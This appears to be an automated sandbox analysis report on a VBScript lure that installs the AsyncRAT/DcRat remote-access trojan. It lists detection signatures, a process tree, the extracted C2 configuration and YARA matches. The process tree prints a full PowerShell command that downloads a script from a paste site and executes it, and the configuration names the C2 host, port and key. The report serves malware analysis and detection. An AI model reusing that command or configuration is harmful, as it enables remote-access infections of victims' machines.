Edit tour

Windows Analysis Report
Re-RFQ - PN List.vbs

Overview

General Information

Sample Name:	Re-RFQ - PN List.vbs
Analysis ID:	627719
MD5:	867aa07dd614380e5943bccd70fee675
SHA1:	b97d664bc1f9f8f3ba2819f17154e4d32618734c
SHA256:	35d11d86e996833469ee713fce6ba52dbcdcf3211e36985182f47040c2166ac9
Tags:	vbs
Infos:

Detection

AsyncRAT, DcRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected RUNPE

System process connects to network (likely due to code injection or exploit)

Yara detected DcRat

Yara detected AsyncRAT

Antivirus detection for dropped file

Sigma detected: Drops script at startup location

Snort IDS alert for network traffic

Writes to foreign memory regions

Compiles code for process injection (via .Net compiler)

Wscript starts Powershell (via cmd or directly)

.NET source code references suspicious native API functions

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops VBS files to the startup folder

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Tries to load missing DLLs

Detected TCP or UDP traffic on non-standard ports

Contains functionality to detect virtual machines (SLDT)

Creates a start menu entry (Start Menu\Programs\Startup)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Compiles C# or VB.Net code

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7072 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

powershell.exe (PID: 6488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1 MD5: 95000560239032BC68B4C2FDFCDEF913)

csc.exe (PID: 6876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 1112 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

InstallUtil.exe (PID: 6428 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)

wscript.exe (PID: 6944 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

powershell.exe (PID: 7116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1 MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6444 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6680 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

InstallUtil.exe (PID: 1400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)

cleanup

Malware Configuration

Threatname: AsyncRAT

{"Server": "sky01.publicvm.com", "Ports": "9217", "Version": " 1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "5RESCY68ciiacdgkayNo6rGfK4TKsWv4", "Mutex": "DcRatMutex_qwqdanchun", "AntiDetection": "null", "External_config_on_Pastebin": "false", "BDOS": "1", "Startup_Delay": "Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==", "HWID": "null", "Certificate": "MIICMDCCAZmgAwIBAgIVANDdhyIzFkRkVUdU1pUsWShwjeXTMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIwMTEyNzIxMjU0NVoXDTMxMDkwNjIxMjU0NVowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJAPN6hAAYtlFpprsg+awNYGXe+gvrIVoVQz2ubNjglQKceBMbhrB9fJZfXJkDLol6/a3Jd4JycS51W+zZgLbcjK8rwRyJ+AUI9TJN4ghCPvSgqXiqTzwruPo+z8B41xcddSJ8Iv49ReFpZGNfbzC4AL5U3gWj+Gq+o4Eh1TigrrAgMBAAGjMjAwMB0GA1UdDgQWBBSieJAE4Zd65wRgTOwM9yD2xjDKZjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAH+wbEwYgTSF3NRuSaLbjALT8E5lmhrkkc7l8R7dojnqZqGA6GqIR3B1aERDKeX6YY3msdmw4uK4K7qWXuWRhjn1Zbweea4YrUyTLtTu1OYJpE9z7vVTfXi7Pkl+j9187kZ8f+S+EvFo9aw2YO5jK9UTyZ8dhtQuhpC9sRSCwQ5f", "ServerSignature": "WoklUUd+SGm6e+hGmYIVMdTguE/XnNLwPxGmIOoxt2UjxnKg6OsTdNTB9cmWQ+jVcpyD/M40s29l+GdlklpBRG3mflrHprg7R+Q9GKMdUToU8MO6imLwgYm5Ft0mzcc8W5sb5cqZ4Bg8wPJ907IBJ3Gd0vUUtxJgxLqCP7AFfis=", "Group": "false"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\gia9ab2dg0.PS1	JoeSecurity_RUNPE	Yara detected RUNPE	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DcRat_2	Yara detected DcRat	Joe Security
00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000006.00000003.432425896.0000024667561000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RUNPE	Yara detected RUNPE	Joe Security
00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000002.535852707.000001D39DE83000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RUNPE	Yara detected RUNPE	Joe Security
0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000003.476766953.000001D3A6611000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RUNPE	Yara detected RUNPE	Joe Security
00000002.00000002.535670022.000001B3C4BF7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RUNPE	Yara detected RUNPE	Joe Security
0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RUNPE	Yara detected RUNPE	Joe Security
00000002.00000002.527898174.000001B3B54C8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RUNPE	Yara detected RUNPE	Joe Security
Process Memory Space: powershell.exe PID: 6488	JoeSecurity_RUNPE	Yara detected RUNPE	Joe Security
Process Memory Space: powershell.exe PID: 6488	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xf3d:$b3: ::UTF8.GetString( 0x221a:$b3: ::UTF8.GetString( 0x269a:$b3: ::UTF8.GetString( 0x447f:$b3: ::UTF8.GetString( 0x479d:$b3: ::UTF8.GetString( 0x77cdb:$b3: ::UTF8.GetString( 0xa6a0c:$b3: ::UTF8.GetString( 0xa6b6a:$b3: ::UTF8.GetString( 0xb0e00:$b3: ::UTF8.GetString( 0xb111e:$b3: ::UTF8.GetString( 0xdd9b5:$b3: ::UTF8.GetString( 0xddcf3:$b3: ::UTF8.GetString( 0xde269:$b3: ::UTF8.GetString( 0xde70b:$b3: ::UTF8.GetString( 0xdeb24:$b3: ::UTF8.GetString( 0xdf068:$b3: ::UTF8.GetString( 0x16be88:$b3: ::UTF8.GetString( 0x16c7bb:$b3: ::UTF8.GetString( 0x176ca7:$b3: ::UTF8.GetString( 0x1a29f8:$b3: ::UTF8.GetString( 0x1a2b56:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 924	JoeSecurity_RUNPE	Yara detected RUNPE	Joe Security
Process Memory Space: powershell.exe PID: 924	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: powershell.exe PID: 7116	JoeSecurity_RUNPE	Yara detected RUNPE	Joe Security
Process Memory Space: powershell.exe PID: 7116	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 6428	JoeSecurity_DcRat_2	Yara detected DcRat	Joe Security
Process Memory Space: InstallUtil.exe PID: 6428	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.powershell.exe.1d38e3da290.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e3da290.1.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7c58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7ba3:$s2: L2Mgc2NodGFza3MgL2 0x7b22:$s3: QW1zaVNjYW5CdWZmZXI 0x7b70:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e3da290.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7eda:$q1: Select * from Win32_CacheMemory 0x7f1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7f68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7fb6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e3da290.1.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x8352:$s1: DcRatBy
17.0.InstallUtil.exe.400000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
17.0.InstallUtil.exe.400000.1.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.InstallUtil.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
17.0.InstallUtil.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
17.0.InstallUtil.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
11.2.powershell.exe.1d38e8b7a20.5.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e8b7a20.5.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7c58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7ba3:$s2: L2Mgc2NodGFza3MgL2 0x7b22:$s3: QW1zaVNjYW5CdWZmZXI 0x7b70:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e8b7a20.5.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7eda:$q1: Select * from Win32_CacheMemory 0x7f1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7f68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7fb6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e8b7a20.5.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x8352:$s1: DcRatBy
11.2.powershell.exe.1d38e8932f8.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e8932f8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.powershell.exe.1d38e8932f8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e8932f8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e8932f8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
11.2.powershell.exe.1d38e8932f8.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e8932f8.3.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7c58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7ba3:$s2: L2Mgc2NodGFza3MgL2 0x7b22:$s3: QW1zaVNjYW5CdWZmZXI 0x7b70:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e8932f8.3.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7eda:$q1: Select * from Win32_CacheMemory 0x7f1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7f68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7fb6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e8932f8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x8352:$s1: DcRatBy
6.2.powershell.exe.2464fbd9680.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.2.powershell.exe.2464fbd9680.3.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7c58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7ba3:$s2: L2Mgc2NodGFza3MgL2 0x7b22:$s3: QW1zaVNjYW5CdWZmZXI 0x7b70:$s4: VmlydHVhbFByb3RlY3Q
6.2.powershell.exe.2464fbd9680.3.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7eda:$q1: Select * from Win32_CacheMemory 0x7f1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7f68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7fb6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.2464fbd9680.3.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x8352:$s1: DcRatBy
11.2.powershell.exe.1d38e8aba40.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e8aba40.4.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7c58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7ba3:$s2: L2Mgc2NodGFza3MgL2 0x7b22:$s3: QW1zaVNjYW5CdWZmZXI 0x7b70:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e8aba40.4.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7eda:$q1: Select * from Win32_CacheMemory 0x7f1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7f68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7fb6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e8aba40.4.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x8352:$s1: DcRatBy
17.0.InstallUtil.exe.400000.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
17.0.InstallUtil.exe.400000.3.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.InstallUtil.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
17.0.InstallUtil.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
17.0.InstallUtil.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
17.0.InstallUtil.exe.400000.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
17.0.InstallUtil.exe.400000.4.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.InstallUtil.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
17.0.InstallUtil.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
17.0.InstallUtil.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
6.2.powershell.exe.2464fbc0f38.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.2.powershell.exe.2464fbc0f38.2.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7c58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7ba3:$s2: L2Mgc2NodGFza3MgL2 0x7b22:$s3: QW1zaVNjYW5CdWZmZXI 0x7b70:$s4: VmlydHVhbFByb3RlY3Q
6.2.powershell.exe.2464fbc0f38.2.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7eda:$q1: Select * from Win32_CacheMemory 0x7f1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7f68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7fb6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.2464fbc0f38.2.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x8352:$s1: DcRatBy
11.2.powershell.exe.1d38e3e6138.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e3e6138.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7c58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7ba3:$s2: L2Mgc2NodGFza3MgL2 0x7b22:$s3: QW1zaVNjYW5CdWZmZXI 0x7b70:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e3e6138.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7eda:$q1: Select * from Win32_CacheMemory 0x7f1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7f68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7fb6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e3e6138.0.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x8352:$s1: DcRatBy
14.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
14.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
